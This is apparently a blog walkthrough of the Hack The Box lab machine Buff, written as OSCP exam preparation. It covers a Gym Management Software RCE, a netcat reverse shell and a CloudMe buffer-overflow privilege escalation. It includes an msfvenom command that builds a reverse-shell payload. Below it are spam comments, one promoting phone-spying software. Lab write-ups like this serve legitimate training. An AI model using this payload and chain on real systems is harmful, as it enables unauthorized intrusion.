OSCP PREPROTİONS – HTB Buff

Buff machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, ports 7680/tcp pando-pub and 8080/tcp http Apache 2.4.43 are open.
We provide enumeration on port 8080.

We did not get any results in the source code, but if we look at its general appearance, we understand that it is a website about Fitness.
We scan with gobuster for hidden files and directories.

We didn’t find anything in the scan result.
Continue enumeration from the web interface

Made using Gym Management Software 1.0, let’s search if there is a vulnerability related to it

We’ve seen the RCE vulnerability here. Let’s pull this into our local machine and see

There is nothing we can change on the code, let’s use it.

gave us Shell on user buff\shaun
here but we can’t get a stable Shell, we can’t change directories etc.
Let’s install nc here and try to give ourselves a stable shel
here when we give our smbshare without password, it did not accept it, we cannot use it in powershelli

Therefore we will create a password username with smbshare.

We successfully copied the nc
Now it’s time to run nc and get revershell

We have our shell, we have obtained the user flag, but we cannot access the administrtor folder, so we continue local enumuraion.

Download Winpeas.exe

Here we understand that CloudMe_1112.exe is running inside.
(CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software).
Let’s see if there is a vulnerability related to this

We have seen that there are vulnerabilities with the same version of CloudMe exe’s name, but they are python, but I need python in windows to use them, but it does not come by default in windows, so we will use port forwarding management.
We transferred the chisel to the target machine

Let’s do port forwarding from Chisel

We have done our port forwarding and now it is time to list the exploits belonging to CloudMe.

Here we’ll download the PoC exploit and edit it.

As you can see here it opens the calculator and we want something more, namely to give us revershell.
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4700 -b ‘\x00\x0A\x0D’ -f python -v payload
here we create with msfvenom

We update the existing exploit. We use the payload we got.
I’ll add the payload and put Shell on standby.

And we got Shell from the administrator user
This is how we got our root flag.

Comments

  1. najlepszy sklep

    I really like your blog.. very nice colors & theme.
    Did you make this website yourself or did you hire someone
    to do it for you? Plz reply as I’m looking to create my own blog and would
    like to know where u got this from. thanks I saw similar here:
    Najlepszy sklep

  2. ecommerce

    Hello there! Do you know if they make any plugins to help with SEO?
    I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good success.
    If you know of any please share. Cheers! You can read
    similar text here: Sklep internetowy

  3. Szpiegowskie Telefonu

    Możesz używać oprogramowania do zarządzania rodzicami, aby kierować i nadzorować zachowanie dzieci w Internecie. Za pomocą 10 najinteligentniejszych programów do zarządzania rodzicami możesz śledzić historię połączeń dziecka, historię przeglądania, dostęp do niebezpiecznych treści, instalowane przez nie aplikacje itp.

  4. Backlink Building

    Hello there! Do you know if they make any plugins
    to assist with Search Engine Optimization? I’m trying to get my blog
    to rank for some targeted keywords but I’m not seeing very good results.
    If you know of any please share. Cheers! I saw similar blog here: Backlinks List

  5. Etha Canner

    Hi are using WordPress for your site platform? I’m new to the blog world but I’m trying to get started and create my own. Do you require any html coding knowledge to make your own blog? Any help would be greatly appreciated!

  6. Puravive

    Only wanna remark on few general things, The website pattern is perfect, the content material is real fantastic. “By following the concept of ‘one country, two systems,’ you don’t swallow me up nor I you.” by Deng Xiaoping.

  7. uweed

    Howdy! Do you know if they make any plugins to assist with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results. If you know of any please share. Appreciate it!

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir